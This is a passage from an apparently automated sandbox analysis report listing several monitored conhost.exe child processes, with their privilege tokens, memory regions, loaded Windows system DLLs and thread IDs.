"\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4748 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 133 os_tid = 0xf14 Thread: id = 178 os_tid = 0xc70 Thread: id = 213 os_tid = 0x1058 Thread: id = 310 os_tid = 0x1208 Process: id = "103" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf9ab000" os_pid = "0xf18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "60" os_parent_pid = "0xdb4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2127 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2128 start_va = 0x3873530000 end_va = 0x387354ffff entry_point = 0x0 region_type = private name = "private_0x0000003873530000" filename = "" Region: id = 2129 start_va = 0x3873550000 end_va = 0x3873563fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003873550000" filename = "" Region: id = 2130 start_va = 0x3873570000 end_va = 0x38735affff entry_point = 0x0 region_type = private name = "private_0x0000003873570000" filename = "" Region: id = 2131 start_va = 0x7df5ff8a0000 end_va = 0x7ff5ff89ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff8a0000" filename = "" Region: id = 2132 start_va = 0x7ff6c47a0000 end_va = 0x7ff6c47c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47a0000" filename = "" Region: id = 2133 start_va = 0x7ff6c47cd000 end_va = 0x7ff6c47cefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47cd000" filename = "" Region: id = 2134 start_va = 0x7ff6c47cf000 end_va = 0x7ff6c47cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47cf000" filename = "" Region: id = 2135 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2136 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2137 start_va = 0x3873680000 end_va = 0x387377ffff entry_point = 0x0 region_type = private name = "private_0x0000003873680000" filename = "" Region: id = 2138 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2139 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2640 start_va = 0x3873530000 end_va = 0x387353ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003873530000" filename = "" Region: id = 2641 start_va = 0x3873540000 end_va = 0x3873546fff entry_point = 0x0 region_type = private name = "private_0x0000003873540000" filename = "" Region: id = 2642 start_va = 0x38735b0000 end_va = 0x387366dfff entry_point = 0x38735b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2643 start_va = 0x3873670000 end_va = 0x3873670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003873670000" filename = "" Region: id = 2644 start_va = 0x3873780000 end_va = 0x38737bffff entry_point = 0x0 region_type = private name = "private_0x0000003873780000" filename = "" Region: id = 2645 start_va = 0x38737c0000 end_va = 0x38737c6fff entry_point = 0x0 region_type = private name = "private_0x00000038737c0000" filename = "" Region: id = 2646 start_va = 0x38737d0000 end_va = 0x38737d0fff entry_point = 0x0 region_type = private name = "private_0x00000038737d0000" filename = "" Region: id = 2647 start_va = 0x38737e0000 end_va = 0x38737e0fff entry_point = 0x0 region_type = private name = "private_0x00000038737e0000" filename = "" Region: id = 2648 start_va = 0x3873870000 end_va = 0x387387ffff entry_point = 0x0 region_type = private name = "private_0x0000003873870000" filename = "" Region: id = 2649 start_va = 0x3873880000 end_va = 0x3873a07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003873880000" filename = "" Region: id = 2650 start_va = 0x3873a10000 end_va = 0x3873b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003873a10000" filename = "" Region: id = 2651 start_va = 0x3873ba0000 end_va = 0x3874f9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003873ba0000" filename = "" Region: id = 2652 start_va = 0x7ff6c46a0000 end_va = 0x7ff6c479ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46a0000" filename = "" Region: id = 2653 start_va = 0x7ff6c47cb000 end_va = 0x7ff6c47ccfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47cb000" filename = "" Region: id = 2654 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2655 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2656 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2657 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2658 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2659 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2660 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2661 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2662 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2663 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2664 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2665 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4778 start_va = 0x3873810000 end_va = 0x387381ffff entry_point = 0x0 region_type = private name = "private_0x0000003873810000" filename = "" Region: id = 4779 start_va = 0x3873820000 end_va = 0x387385ffff entry_point = 0x0 region_type = private name = "private_0x0000003873820000" filename = "" Region: id = 4780 start_va = 0x38750a0000 end_va = 0x38750affff entry_point = 0x0 region_type = private name = "private_0x00000038750a0000" filename = "" Region: id = 4781 start_va = 0x38750b0000 end_va = 0x38753e6fff entry_point = 0x38750b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4782 start_va = 0x38753f0000 end_va = 0x3875605fff entry_point = 0x0 region_type = private name = "private_0x00000038753f0000" filename = "" Region: id = 4783 start_va = 0x3875610000 end_va = 0x3875820fff entry_point = 0x0 region_type = private name = "private_0x0000003875610000" filename = "" Region: id = 4784 start_va = 0x3875830000 end_va = 0x3875938fff entry_point = 0x0 region_type = private name = "private_0x0000003875830000" filename = "" Region: id = 4785 start_va = 0x3875940000 end_va = 0x3875b54fff entry_point = 0x0 region_type = private name = "private_0x0000003875940000" filename = "" Region: id = 4786 start_va = 0x3875b60000 end_va = 0x3875c69fff entry_point = 0x0 region_type = private name = "private_0x0000003875b60000" filename = "" Region: id = 4787 start_va = 0x7ff6c47c9000 end_va = 0x7ff6c47cafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47c9000" filename = "" Region: id = 4788 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4789 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4790 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4791 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4792 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4793 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4794 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4795 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4796 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 134 os_tid = 0xf1c Thread: id = 179 os_tid = 0xc38 Thread: id = 211 os_tid = 0x1050 Thread: id = 312 os_tid = 0x1210 Process: id = "104" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6608b000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0xdbc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2140 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2141 start_va = 0x2cb2010000 end_va = 0x2cb202ffff entry_point = 0x0 region_type = private name = "private_0x0000002cb2010000" filename = "" Region: id = 2142 start_va = 0x2cb2030000 end_va = 0x2cb2043fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002cb2030000" filename = "" Region: id = 2143 start_va = 0x2cb2050000 end_va = 0x2cb208ffff entry_point = 0x0 region_type = private name = "private_0x0000002cb2050000" filename = "" Region: id = 2144 start_va = 0x7df5ff5e0000 end_va = 0x7ff5ff5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5e0000" filename = "" Region: id = 2145 start_va = 0x7ff6c45c0000 end_va = 0x7ff6c45e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c45c0000" filename = "" Region: id = 2146 start_va = 0x7ff6c45e4000 end_va = 0x7ff6c45e4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45e4000" filename = "" Region: id = 2147 start_va = 0x7ff6c45ee000 end_va = 0x7ff6c45effff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45ee000" filename = "" Region: id = 2148 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2149 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2150 start_va = 0x2cb21e0000 end_va = 0x2cb22dffff entry_point = 0x0 region_type = private name = "private_0x0000002cb21e0000" filename = "" Region: id = 2151 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2152 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3394 start_va = 0x2cb2010000 end_va = 0x2cb201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002cb2010000" filename = "" Region: id = 3395 start_va = 0x2cb2020000 end_va = 0x2cb2026fff entry_point = 0x0 region_type = private name = "private_0x0000002cb2020000" filename = "" Region: id = 3396 start_va = 0x2cb2090000 end_va = 0x2cb214dfff entry_point = 0x2cb2090000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3397 start_va = 0x2cb2150000 end_va = 0x2cb218ffff entry_point = 0x0 region_type = private name = "private_0x0000002cb2150000" filename = "" Region: id = 3398 start_va = 0x2cb2190000 end_va = 0x2cb2190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002cb2190000" filename = "" Region: id = 3399 start_va = 0x2cb21a0000 end_va = 0x2cb21a6fff entry_point = 0x0 region_type = private name = "private_0x0000002cb21a0000" filename = "" Region: id = 3400 start_va = 0x2cb21b0000 end_va = 0x2cb21b0fff entry_point = 0x0 region_type = private name = "private_0x0000002cb21b0000" filename = "" Region: id = 3401 start_va = 0x2cb21c0000 end_va = 0x2cb21c0fff entry_point = 0x0 region_type = private name = "private_0x0000002cb21c0000" filename = "" Region: id = 3402 start_va = 0x2cb23f0000 end_va = 0x2cb23fffff entry_point = 0x0 region_type = private name = "private_0x0000002cb23f0000" filename = "" Region: id = 3403 start_va = 0x2cb2400000 end_va = 0x2cb2587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002cb2400000" filename = "" Region: id = 3404 start_va = 0x2cb2590000 end_va = 0x2cb2710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002cb2590000" filename = "" Region: id = 3405 start_va = 0x2cb2720000 end_va = 0x2cb3b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002cb2720000" filename = "" Region: id = 3406 start_va = 0x7ff6c44c0000 end_va = 0x7ff6c45bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44c0000" filename = "" Region: id = 3407 start_va = 0x7ff6c45ec000 end_va = 0x7ff6c45edfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45ec000" filename = "" Region: id = 3408 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3409 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3410 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3411 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3412 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3413 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3414 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3415 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3416 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3417 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3418 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3419 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4118 start_va = 0x2cb2050000 end_va = 0x2cb205ffff entry_point = 0x0 region_type = private name = "private_0x0000002cb2050000" filename = "" Region: id = 4119 start_va = 0x2cb22e0000 end_va = 0x2cb231ffff entry_point = 0x0 region_type = private name = "private_0x0000002cb22e0000" filename = "" Region: id = 4120 start_va = 0x2cb2320000 end_va = 0x2cb235ffff entry_point = 0x0 region_type = private name = "private_0x0000002cb2320000" filename = "" Region: id = 4121 start_va = 0x2cb2390000 end_va = 0x2cb239ffff entry_point = 0x0 region_type = private name = "private_0x0000002cb2390000" filename = "" Region: id = 4122 start_va = 0x2cb3b20000 end_va = 0x2cb3e56fff entry_point = 0x2cb3b20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4123 start_va = 0x2cb3e60000 end_va = 0x2cb4070fff entry_point = 0x0 region_type = private name = "private_0x0000002cb3e60000" filename = "" Region: id = 4124 start_va = 0x2cb4080000 end_va = 0x2cb429cfff entry_point = 0x0 region_type = private name = "private_0x0000002cb4080000" filename = "" Region: id = 4125 start_va = 0x2cb42a0000 end_va = 0x2cb43acfff entry_point = 0x0 region_type = private name = "private_0x0000002cb42a0000" filename = "" Region: id = 4126 start_va = 0x2cb43b0000 end_va = 0x2cb45cafff entry_point = 0x0 region_type = private name = "private_0x0000002cb43b0000" filename = "" Region: id = 4127 start_va = 0x2cb45d0000 end_va = 0x2cb46e3fff entry_point = 0x0 region_type = private name = "private_0x0000002cb45d0000" filename = "" Region: id = 4128 start_va = 0x7ff6c45ea000 end_va = 0x7ff6c45ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45ea000" filename = "" Region: id = 4129 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4130 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4131 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4132 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4133 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4134 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4135 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4136 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4137 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 135 os_tid = 0xf24 Thread: id = 180 os_tid = 0xc30 Thread: id = 239 os_tid = 0x10c0 Thread: id = 280 os_tid = 0x1190 Process: id = "105" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xfa18000" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "62" os_parent_pid = "0xdc4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2153 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2154 start_va = 0xaada540000 end_va = 0xaada55ffff entry_point = 0x0 region_type = private name = "private_0x000000aada540000" filename = "" Region: id = 2155 start_va = 0xaada560000 end_va = 0xaada573fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aada560000" filename = "" Region: id = 2156 start_va = 0xaada580000 end_va = 0xaada5bffff entry_point = 0x0 region_type = private name = "private_0x000000aada580000" filename = "" Region: id = 2157 start_va = 0x7df5fffb0000 end_va = 0x7ff5fffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffb0000" filename = "" Region: id = 2158 start_va = 0x7ff6c4400000 end_va = 0x7ff6c4422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4400000" filename = "" Region: id = 2159 start_va = 0x7ff6c442c000 end_va = 0x7ff6c442cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c442c000" filename = "" Region: id = 2160 start_va = 0x7ff6c442e000 end_va = 0x7ff6c442ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c442e000" filename = "" Region: id = 2161 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2162 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2163 start_va = 0xaada730000 end_va = 0xaada82ffff entry_point = 0x0 region_type = private name = "private_0x000000aada730000" filename = "" Region: id = 2164 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2165 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3420 start_va = 0xaada540000 end_va = 0xaada54ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aada540000" filename = "" Region: id = 3421 start_va = 0xaada550000 end_va = 0xaada556fff entry_point = 0x0 region_type = private name = "private_0x000000aada550000" filename = "" Region: id = 3422 start_va = 0xaada5c0000 end_va = 0xaada67dfff entry_point = 0xaada5c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") 